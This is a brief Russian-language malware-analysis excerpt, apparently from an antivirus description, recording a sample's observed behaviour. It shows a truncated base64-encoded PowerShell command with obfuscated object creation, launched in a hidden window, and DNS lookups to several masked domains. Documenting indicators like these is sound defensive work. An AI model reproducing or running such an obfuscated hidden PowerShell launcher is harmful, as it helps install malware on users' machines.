Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHcAUwBgAEMAUgBgAEkAcAB0AH0AIAA9ACAAJgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAGoAZQBjAHQAJwAsACcAbgBlACcALAAnAHcALQBvAGIAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADEAfQB7ADMAfQB7AD...
- DNS ASK e-###sis.com
- DNS ASK jo##un.com
- DNS ASK cv##.org
- DNS ASK da##.com.hk
- DNS ASK fu###studio.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AHcAUwBgAEMAUgBgAEkAcAB0AH0AIAA9ACAAJgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAGoAZQBjAHQAJwAsACcAbgBlACcALAAnAHcALQBvAGIAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADEAfQB7ADMAfQB7AD...' (со скрытым окном)